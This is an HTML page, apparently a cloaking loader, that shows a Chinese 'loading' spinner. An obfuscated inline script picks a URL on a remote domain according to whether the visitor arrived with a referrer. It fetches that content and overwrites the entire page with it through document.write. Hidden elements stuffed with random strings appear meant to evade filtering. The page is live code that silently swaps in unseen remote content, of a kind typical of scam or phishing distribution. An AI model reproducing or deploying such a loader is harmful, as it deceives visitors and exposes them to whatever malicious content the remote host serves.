<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .me5W4B8bx {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .me5W4B8bx .RvOGorIbK {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .me5W4B8bx .content {
            line-height: 50px;
            text-align: center
        }

        .me5W4B8bx .img {
            width: 100%
        }

        .me5W4B8bx .velCUM {
            text-align: center
        }

        .me5W4B8bx .velCUM span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .me5W4B8bx .velCUM span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .me5W4B8bx .velCUM span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .me5W4B8bx .velCUM span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .me5W4B8bx .velCUM span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .me5W4B8bx .velCUM span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .me5W4B8bx .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function ZwGCBGQTER(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var JuThuQo = ZwGCBGQTER('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ JuThuQo +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ JuThuQo +".html?a=share";
		}
		
        m8gq4M=url+"#"+new Date().getTime();
        m8gq4M && function() {
            $.get(m8gq4M, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>D38UxRkrpC3eQdIZDVWAE</p>
<b style='display:none' >xYRBZeosXCvhLeJJaE3jdR1zfgT6CSVhc50G2f9JcTBe4Pcn6QcB6dG4XwPy2Jdr9</b>
<a  href='#' style='display:none'>ZKbchKXz8zv4ywp1O0VycFXhzSEnmL1iNb07IfQVMoGPxD37h5F0QHK4ZfEYECchM2T5RcuRmp8e</a>
<a  href='#' style='display:none'>ZKbchKXz8zv4ywp1O0VycFXhzSEnmL1iNb07IfQVMoGPxD37h5F0QHK4ZfEYECchM2T5RcuRmp8e</a>
<p  style='display:none'>D38UxRkrpC3eQdIZDVWAE</p><div class="me5W4B8bx">
    <div class="RvOGorIbK">
        <div class="velCUM">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<li style='display:none' >tC8huad8lwgQMpcbkLkQtoW8w</li>
<a  href='#' style='display:none'>rBGwjFH8pYsxWFRaMmSFrH8OWnXv0VjRvx0Outmjcykr6zVjO0UNXB67t0USxeY</a>
<span style='display:none'>RdOfRnOrr1nUqxNObPBr6WVW0UGzDUubavSn1aNjEN2qTz75K7NoYI7QhdRabsNEl</span>
<b style='display:none' >dCP3QPr3lEYnEwaFKeRUSmsIbbOoYcRS0B8ef9d9hBuB3nqYIiQUt72N8rEC0zKHqbNEqcpf6</b>
<a  href='#' style='display:none'>rBGwjFH8pYsxWFRaMmSFrH8OWnXv0VjRvx0Outmjcykr6zVjO0UNXB67t0USxeY</a>
<span style='display:none'>RdOfRnOrr1nUqxNObPBr6WVW0UGzDUubavSn1aNjEN2qTz75K7NoYI7QhdRabsNEl</span>
<h1 style='display:none' >J2BfR015Y6tPbY00ponGE9rPruYviCXDaNywGT4JMMM3RBI7LuBP3mTfPSXmfnC4NmvodESoxg3ca0</h1>
<ul style='display:none' >Tv38g8v83uTvU8OKpAc0cawzJB8K55dwDFdUbLjnftNCMTdQiG717MzerRcKhr7J4v</ul>
<li style='display:none' >tC8huad8lwgQMpcbkLkQtoW8w</li></body>
</html>